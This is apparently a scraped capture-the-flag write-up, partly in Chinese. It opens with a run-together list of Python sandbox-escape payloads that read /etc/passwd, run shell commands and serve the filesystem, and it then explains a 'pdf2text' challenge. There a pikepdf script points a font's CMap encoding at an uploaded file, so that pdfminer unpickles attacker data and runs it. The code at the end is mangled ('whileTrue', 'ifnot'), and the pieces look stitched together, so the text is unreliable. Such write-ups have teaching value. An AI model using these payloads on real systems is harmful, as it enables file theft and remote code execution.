# python3 print('THIS IS A PYTHON EVAL INTERPRETED OUTPUT') exit() sum(xrange(-999999999,99999999)) file('/etc/passwd').read() open('/etc/passwd').read() __import__['fileinput'].input('/etc/passwd') __import__['os'].system('cat /etc/passwd') __import__['os'].popen('/etc/passwd', 'r').read() __import__['os'].system('cd /; python -m SimpleHTTPServer') print(file('/etc/passwd').read()) print(open('/etc/passwd').read()) print(__import__['fileinput'].input('/etc/passwd')) print(__import__['os'].system('cat /etc/passwd')) print(__import__['os'].popen('/etc/passwd', 'r').read()) print(__import__['os'].system('cd /; python -m SimpleHTTPServer')) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['exit']() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['sum']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['xrange'](-999999999,99999999)) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['file']('/etc/passwd').read() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['open']('/etc/passwd').read() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('fileinput').input('/etc/passwd') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cat /etc/passwd') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('/etc/passwd', 'r').read() [x for x in 
(1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['file']('/etc/passwd').read()) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['open']('/etc/passwd').read()) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('fileinput').input('/etc/passwd')) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cat /etc/passwd')) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('/etc/passwd', 'r').read()) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer'))
随便选一条即可。
pdf2text
一个 PDF-to-text 转换器能有什么危害呢?
What kind of flaw could a PDF-to-text converter possibly have?
Hint 1
Search "pickle.loads" in pdfminer package and try to reach it
def pdf_to_text(pdf_path, txt_path):
    """Write the text of every text container in a PDF to a UTF-8 text file.

    Args:
        pdf_path: Path of the PDF to read; passed straight to
            ``extract_pages``.
        txt_path: Path of the output file. It is opened in ``'w'`` mode, so
            any existing content is overwritten.
    """
    with open(txt_path, 'w', encoding='utf-8') as txt:
        for page_layout in extract_pages(pdf_path):
            for element in page_layout:
                # Only layout elements that carry text are written out;
                # everything else on the page is skipped.
                if isinstance(element, LTTextContainer):
                    txt.write(element.get_text())
                    txt.write('\n')
def get_font(self, objid: object, spec: Mapping[str, object]) -> PDFFont:
    """Return the font object for *spec*, reusing a cached one when possible.

    Args:
        objid: Identifier used as the cache key. A falsy value (e.g. ``None``)
            bypasses both the cache lookup and the cache store.
        spec: Font dictionary. ``"Subtype"`` selects the font class; when it
            is missing, ``"Type1"`` is assumed unless ``settings.STRICT`` is
            set.

    Returns:
        The cached font for *objid*, or a newly constructed font.

    Raises:
        PDFFontError: Only when ``settings.STRICT`` is set and the spec has
            the wrong ``"Type"``, no ``"Subtype"``, or an unknown subtype.
    """
    if objid and objid in self._cached_fonts:
        font = self._cached_fonts[objid]
    else:
        log.debug("get_font: create: objid=%r, spec=%r", objid, spec)
        if settings.STRICT:
            if spec["Type"] is not LITERAL_FONT:
                raise PDFFontError("Type is not /Font")
        # Create a Font object.
        if "Subtype" in spec:
            subtype = literal_name(spec["Subtype"])
        else:
            if settings.STRICT:
                raise PDFFontError("Font Subtype is not specified.")
            subtype = "Type1"
        if subtype in ("Type1", "MMType1"):
            # Type1 Font
            font = PDFType1Font(self, spec)
        elif subtype == "TrueType":
            # TrueType Font
            font = PDFTrueTypeFont(self, spec)
        elif subtype == "Type3":
            # Type3 Font
            font = PDFType3Font(self, spec)
        elif subtype in ("CIDFontType0", "CIDFontType2"):
            # CID Font
            font = PDFCIDFont(self, spec)
        elif subtype == "Type0":
            # Type0 Font: build the first descendant font, carrying the
            # parent's Encoding / ToUnicode entries over into its spec.
            dfonts = list_value(spec["DescendantFonts"])
            assert dfonts
            subspec = dict_value(dfonts[0]).copy()
            for k in ("Encoding", "ToUnicode"):
                if k in spec:
                    subspec[k] = resolve1(spec[k])
            # objid=None: the descendant itself is not cached; only the
            # outer Type0 result is stored below.
            font = self.get_font(None, subspec)
        else:
            if settings.STRICT:
                raise PDFFontError("Invalid Font spec: %r" % spec)
            font = PDFType1Font(self, spec)  # this is so wrong!
        if objid and self.caching:
            self._cached_fonts[objid] = font
    return font
只有命中 `elif subtype in ("CIDFontType0", "CIDFontType2"):` 这个分支,才能进入下一步的调用。可以先了解一下 CID 字体:这种字体把字符按顺序排列,字符在排列中的序号就是它的 CID,而 CMap 文件保存了字符编码与字符 CID 之间的映射关系。所以我们需要一个嵌入了 CID 字体的 PDF。继续往后分析,get_cmap() 会根据编码名称去读取对应的 `<name>.pickle.gz` 文件来获取 CMap 数据。
def _load_data(cls, name: str) -> Any:
    """Load the pickled CMap data stored as ``<name>.pickle.gz``.

    The file is searched for first in the directory named by the
    ``CMAP_PATH`` environment variable (default ``/usr/share/pdfminer/``)
    and then in the ``cmap`` directory next to this module.

    Args:
        name: CMap name. NUL characters are stripped before use.

    Returns:
        A new class named *name* whose namespace is the unpickled object.

    Raises:
        CMapDB.CMapNotFound: If no matching file exists in any search path.
    """
    name = name.replace("\0", "")
    filename = "%s.pickle.gz" % name
    log.debug("loading: %r", name)
    cmap_paths = (
        os.environ.get("CMAP_PATH", "/usr/share/pdfminer/"),
        os.path.join(os.path.dirname(__file__), "cmap"),
    )
    for directory in cmap_paths:
        # NOTE(security): `name` is joined into the path without any
        # validation, and os.path.join discards `directory` when `filename`
        # is absolute. The file content is then handed to pickle.loads,
        # which can execute arbitrary code. If `name` can come from an
        # untrusted document, restrict it to a plain basename before this
        # point. Behavior is intentionally left unchanged here.
        path = os.path.join(directory, filename)
        if os.path.exists(path):
            with gzip.open(path) as gzfile:
                return type(str(name), (), pickle.loads(gzfile.read()))
    raise CMapDB.CMapNotFound(name)
# Walk every object in the opened PDF and rewrite the /Encoding entry of
# Type0 fonts that currently use /Identity-H.
for obj in pdf.objects:
    if isinstance(obj, pikepdf.Dictionary):
        if obj.get("/Type") == "/Font" and obj.get("/Subtype") == "/Type0":
            if obj.get("/Encoding") == pikepdf.Name("/Identity-H"):
                obj["/Encoding"] = pikepdf.Name("//app/uploads/hacker")
if flag & FEXTRA: # Read & discard the extra field, if present extra_len, = struct.unpack("<H", self._read_exact(2)) self._read_exact(extra_len) if flag & FNAME: # Read and discard a null-terminated string containing the filename whileTrue: s = self._fp.read(1) ifnot s or s==b'\000': break if flag & FCOMMENT: # Read and discard a null-terminated string containing a comment whileTrue: s = self._fp.read(1) ifnot s or s==b'\000': break if flag & FHCRC: self._read_exact(2) # Read & discard the 16-bit header CRC returnTrue